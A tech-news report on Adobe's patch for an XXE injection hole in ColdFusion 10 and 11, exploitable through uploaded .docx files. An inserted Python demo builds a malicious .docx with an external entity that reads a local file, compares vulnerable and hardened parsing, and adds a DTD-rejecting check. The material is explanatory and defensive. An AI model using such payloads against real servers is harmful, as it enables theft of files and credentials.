Adobe ices ColdFusion server admin password, file hack hole

Slap patch, no need to reboot

Adobe has patched a hole in ColdFusion that could have allowed hackers to gain access to files and passwords stored on servers.

The application platform is used by some 30 million websites.

The XML external entity (XXE) injection vulnerability is triggered when ColdFusion processes Word (.docx) documents, which are zip archives of XML parts, Legal Hackers security researcher Dawid Golunski says.

Attackers could also have used it for server-side request forgery (SSRF) and, less seriously, SMB relay attacks.

ColdFusion versions 10 and 11 are affected.

"Depending on the web application's functionality and the attacker's ability to supply a malicious document to be processed by a vulnerable ColdFusion application, this vulnerability may potentially be exploited by both low-privileged and unauthenticated remote attackers," Golunski says.

"The ability to read arbitrary files could, for example, let attackers extract sensitive information such as ColdFusion password hashes of the management console or stored database credentials.

"This could allow unauthorised access to weakly protected ColdFusion management interfaces and let attackers upload malicious code which could be used to fully compromise the server."
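To show the mechanism Golunski describes, here is an added example that is not from the advisory, from Adobe, or from ColdFusion's own code. It builds a minimal .docx (a zip of XML parts) whose word/document.xml declares an external entity pointing at a local file, then feeds that part through Python's xml.sax twice: once with external general entities enabled, standing in for a parser that resolves them by default as the vulnerable ColdFusion path did, and once with them disabled. It also runs the gateway check a practitioner would put in front of an upload handler: refuse any Office package whose XML parts carry a DOCTYPE or entity declaration. The "secret" file, the document text and all paths are constructed for the demo; the real ColdFusion parser and its configuration are not reproduced here.

```python
import io
import os
import tempfile
import zipfile
import xml.sax
import xml.sax.handler

# Constructed stand-in for a file an attacker would target (e.g. a file holding
# a ColdFusion admin password hash). Not real data.
SAMPLE_SECRET = "admin:SECRET-ADMIN-HASH-0123456789abcdef\n"

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def build_malicious_docx(target_path):
    """Return the bytes of a minimal .docx whose word/document.xml declares an
    external entity for target_path and references it inside a text run."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE w:document [\n'
        f'  <!ENTITY xxe SYSTEM "{target_path}">\n'
        ']>\n'
        f'<w:document xmlns:w="{W_NS}">\n'
        '  <w:body><w:p><w:r><w:t>Invoice ref: &xxe;</w:t></w:r></w:p></w:body>\n'
        '</w:document>\n'
    )
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">\n'
        '  <Default Extension="xml" ContentType="application/xml"/>\n'
        '  <Override PartName="/word/document.xml" ContentType="application/vnd.'
        'openxmlformats-officedocument.wordprocessingml.document.main+xml"/>\n'
        '</Types>\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


class _TextCollector(xml.sax.handler.ContentHandler):
    """Collects the character data of every <w:t> run, as a document-to-text
    converter would."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._in_text = False

    def startElement(self, name, attrs):
        if name == "w:t":
            self._in_text = True

    def endElement(self, name):
        if name == "w:t":
            self._in_text = False

    def characters(self, content):
        if self._in_text:
            self.parts.append(content)


def extract_text(docx_bytes, workdir, resolve_external_entities):
    """Unpack word/document.xml into workdir and parse it with xml.sax.
    resolve_external_entities=True is the XXE-vulnerable configuration
    (external general entities are fetched and inlined); False is hardened."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        xml_path = z.extract("word/document.xml", workdir)
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges,
                      resolve_external_entities)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(xml_path)  # parse by filename so the parser has a base URI
    return "".join(handler.parts)


def has_dtd(docx_bytes):
    """Gateway check: flag any Office package in which an XML part carries a
    DOCTYPE or ENTITY declaration. OOXML parts never legitimately use a DTD."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if name.lower().endswith((".xml", ".rels")):
                part = z.read(name)
                if b"<!DOCTYPE" in part or b"<!ENTITY" in part:
                    return True
    return False


def demo():
    """Run the constructed document through both parser configurations and the
    gateway check. Returns (text_from_vulnerable_parser,
    text_from_hardened_parser, flagged_by_gateway)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w") as f:
            f.write(SAMPLE_SECRET)
        docx = build_malicious_docx(secret_path)
        leaked = extract_text(docx, os.path.join(tmp, "vuln"), True)
        safe = extract_text(docx, os.path.join(tmp, "safe"), False)
        return leaked, safe, has_dtd(docx)


if __name__ == "__main__":
    leaked, safe, flagged = demo()
    print("vulnerable parser:", repr(leaked))
    print("hardened parser  :", repr(safe))
    print("gateway rejects  :", flagged)
```

With entity resolution on, the secret's contents come back inside the document's own text, which is exactly how a converter or indexer leaks a file to whoever can read its output; with it off, the entity expands to nothing. Turning off external entities at the parser is the fix; refusing DOCTYPEs in Office parts before parsing is the cheap defence in depth, since no legitimate .docx needs one.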

Golunski supplied Adobe with a proof-of-concept exploit, which he also published in his advisory once the patches were out.

Admins should apply ColdFusion 11 update 10 to squash the bug. ®


Biting the hand that feeds IT © 1998–2017